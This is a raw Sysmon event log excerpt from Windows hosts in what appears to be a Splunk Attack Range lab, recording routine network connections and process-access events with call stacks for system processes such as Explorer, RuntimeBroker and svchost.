Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57296-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:44.706{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5635607959D114843066F35DE57C40ED,SHA256=182539DF7A863D5CAACE5E0D3E37E24C82516476195F4B2F48D0036975D5C79F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=605BDCAAC370784AA45F748D3FCDD881,SHA256=CAB8AE8A6E573281B7EBFE1563541F670E373371082C237BC772DBE939FE31C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.558{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.558{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.558{466BC892-32D3-60E8-770B-00000000CF01}63567400C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.558{466BC892-32D3-60E8-770B-00000000CF01}63567400C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.505{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.505{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.505{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.505{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001049736Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.505{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049735Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.505{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049734Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.490{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.490{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.490{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.474{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 